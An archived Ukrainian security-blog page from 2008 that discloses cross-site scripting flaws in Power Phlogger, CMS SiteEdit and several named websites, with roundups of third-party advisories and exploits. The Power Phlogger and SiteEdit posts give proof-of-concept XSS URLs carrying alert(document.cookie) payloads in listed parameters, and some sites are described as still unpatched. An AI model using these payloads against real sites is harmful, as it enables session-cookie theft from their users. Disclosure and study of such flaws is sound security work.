Архів для категорії 'Уразливості'

Уразливість на www.infosecuritymoscow.com

20:15 12.02.2008

06.09.2007

У березні, 27.03.2007, я знайшов Cross-Site Scripting уразливість на http://www.infosecuritymoscow.com - сайті виставки INFOSECURITY MOSCOW. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.02.2008

XSS:

Дана уразливість досі не виправлена.

Добірка уразливостей

16:33 11.02.2008

В даній добірці уразливості в веб додатках:

  • Multiple vulnerabilities on Absolute News Manager.NET 5.1 including file retrieval and SQL injection (деталі)
  • SQL Injection Vulnerability in Beehive Forum Software (деталі)
  • Cross-site scripting (XSS) vulnerability in Citrix NetScaler 8.0 (деталі)
  • Citrix NetScaler Web Management Cookie Weakness (деталі)
  • Meganoide’s news v1.1.1 < = RFi Vulnerabilities (деталі)
  • Dem_trac acces to log file wihtout authentification (деталі)
  • Turuncu Portal v1.0 == SQL Injection Vulnerability (деталі)
  • PHP-інклюдинг в Newxooper PHP (деталі)
  • TFTPDWIN 0.4.2 Remote Buffer Overflow Exploit (деталі)
  • Міжсайтовий скриптінг в opentaps (деталі)
  • oftpd: Denial of Service (деталі)
  • Виконання довільних команд в TYPO3 (деталі)
  • JV2 Folder Gallery 3.0 (download.php) Remote File Disclosure Exploit (деталі)
  • Розкриття даних в Mono (деталі)
  • Cross-site scripting (XSS) vulnerability in Fastilo 2.0 and Open Solution Quick.Cart 2.0 (деталі)

Уразливості в Power Phlogger

23:52 10.02.2008

Ще 18.08.2006 я виявив Cross-Site Scripting уразливості в Power Phlogger, котрий використовує одна українська компанія як основу для власного рахівника. Про що їм у вересні 2006 повідомив і вони виправили уразливості. Хоча і дуже нечемно забули подякувати мені за мою роботу по підвищенню безпеки їх сайтів - не подякували за жоден з моїх листів про численні уразливості на їхніх сайтах (як на сайті з Power Phlogger, так й інших).

XSS:

POST запит на сторінці http://site/dspLogs.php:

"><script>alert(document.cookie)</script>В полях: Host, Referrer, Agent Information, res, colo, online, mp.

Як я перевірив учора, 09.02.2008, дані уразливості були виправлені лише частково - лише в POST запиті, а в GET XSS залишилися. Також окрім Cross-Site Scripting, я виявив Information disclosure уразливості в Power Phlogger. Про що найближчим часом сповіщу розробників веб додатку.

XSS:

http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information disclosure:

На сторінці http://site/index.php (як й інших сторінках додатку) виводиться важлива інформація про систему (версії PHP та MySQL, як і версія веб сервера з його банера) в мета-тегах. Що приводить до витоку важливої інформації.

<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />

Уразлива версія Power Phlogger 2.2.5 та попередні версії.

Це перша частина уразливостей в Power Phlogger. Найближчим часом напишу про інші уразливості в даному веб додатку.

Уразливість на infostream.ua

19:24 10.02.2008

04.09.2007

У березні, 23.03.2007, я знайшов Cross-Site Scripting уразливість на проекті http://infostream.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

10.02.2008

XSS:

Дана уразливість вже виправлена.

Уразливості на images.search.yahoo.com

23:58 09.02.2008

У липні, 08.07.2007, я знайшов Cross-Site Scripting та Content Spoofing уразливості в пошуковій системі Yahoo, в пошуці по зображенням http://images.search.yahoo.com. Про що найближчим часом сповіщу адміністрацію системи.

XSS (Remote XSS/HTML Include):

Remote XSS Include та Remote HTML Include - це різновид XSS уразливостей, про який я розповідав раніше.

Content Spoofing:

Дані уразливості подібні до уразливостей в пошуці Гугла по зображенням, про які я писав в записі MOSEB-15: Vulnerabilities at images.google.com.

Добірка уразливостей

16:11 09.02.2008

В даній добірці уразливості в веб додатках:

  • Vulnerability in Peanut Knowledge Base (PeanutKB) (деталі)
  • Firebird: Buffer overflow (деталі)
  • Citrix Access Gateway session ID disclosure issue (деталі)
  • Blind Sql-Injection in Joomla 1.5 RC3 (деталі)
  • Mambo/Joomla Component rsgallery <= 2.0 beta 5 (catid) Remote SQL Injection Vulnerability (деталі)
  • RFI and Multiple XSS in PhpMyChat (деталі)
  • Snitz2000 SQL Injection: A user can gain admin level (деталі)
  • PHP remote file inclusion vulnerability in CS-Cart 1.3.3 (деталі)
  • Cross-site scripting vulnerability in Movable Type (MT) 3.33 (деталі)
  • Міжсайтовий скриптінг в Mini Web Shop (деталі)
  • Уразливість при обробці сесій в CA Portal Technology (деталі)
  • PHP remote file inclusion vulnerability in Jshop Server 1.3 (деталі)
  • Security Vulnerability in Processing GIF Images in the Java Runtime Environment May Allow an Untrusted Applet to Elevate Privileges (деталі)
  • KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit (деталі)
  • Розкриття паролів в Ozeki HTTP-SMS Gateway (деталі)

Уразливість в WordPress MU

23:52 08.02.2008

В WordPress MU версії до 1.3.2 включно виявлена уразливість, що дозволяє виконати PHP код. До якої був написаний експлоіт.

  • Wordpress MU < 1.3.2 active_plugins option Code Execution Exploit (деталі)

Дана уразливість пов’язана з опцією active_plugins. Експоїт перезаписує опцію active_plugins движка і використовує її для виконання довільного PHP коду.

Уразливість на www.radiomayak.ru

20:15 08.02.2008

09.09.2007

У березні, 01.03.2007, я знайшов Cross-Site Scripting уразливість на проекті http://www.radiomayak.ru (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

08.02.2008

XSS:

Дана уразливість досі не виправлена.

Добірка уразливостей

16:33 07.02.2008

В даній добірці уразливості в веб додатках:

  • DBGuestbook 1.1 (dbs_base_path) Remote File Include Vulnerabilities (деталі)
  • DBImageGallery 1.2.2 (donsimg_base_path) RFI Vulnerabilities: (деталі)
  • New mono packages fix integer overflow (деталі)
  • File upload vulnerability in Connectix Boards (деталі)
  • SQL injection vulnerability in Connectix Boards (деталі)
  • PHP remote file inclusion vulnerability in hbm (деталі)
  • SQL injection vulnerability in Design4Online UserPages2 2.0 (деталі)
  • Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS (деталі)
  • HTTP Response Splitting атака в Oracle Portal (деталі)
  • SQL injection vulnerability in VP-ASP Shopping Cart (деталі)
  • Cross-site scripting (XSS) vulnerability in VP-ASP Shopping Cart (деталі)
  • SQL injection vulnerability in uniForum (деталі)
  • PHP-інклюдинг в TextSend (деталі)
  • PHP-інклюдинг в phpProfiles (деталі)
  • Vulnerability in slocate 3.1 (деталі)

Cross-Site Scripting уразливості в CMS SiteEdit

23:49 06.02.2008

Раніше я вже писав про XSS уразливість в CMS SiteEdit, виявлену на http://www.siteedit.ru - сайті виробника даної системи. І ось сьогодні, Олександр, повідомив в коментарях про те, що він виявив ще ряд дір на сайті. Котрі я перевірив і підтвердив їх та виявив ще чималу кількість нових Cross-Site Scripting уразливостей на даному сайті та в CMS SiteEdit (загалом 17 XSS).

XSS:

В скрипті thanks в параметрах formobj_email, formobj_message, formobj_edit, formobj_name, formobj_company, formobj_jobtitle, formobj_site, formobj_address, formobj_telephone, formobj_img, formobj_GoTo, autoreply_text.

http://site/thanks?formobj_email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

В скрипті registration в параметрах login, email, first_name, last_name.

http://site/registration?login=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливості на http://www.siteedit.ru.

XSS:

В скрипті thanks в параметрах formobj_email, formobj_message, formobj_edit, formobj_name, formobj_company, formobj_jobtitle, formobj_site, formobj_address, formobj_telephone, formobj_img, formobj_GoTo, autoreply_text.

В скрипті registration в параметрах login, email, first_name, last_name.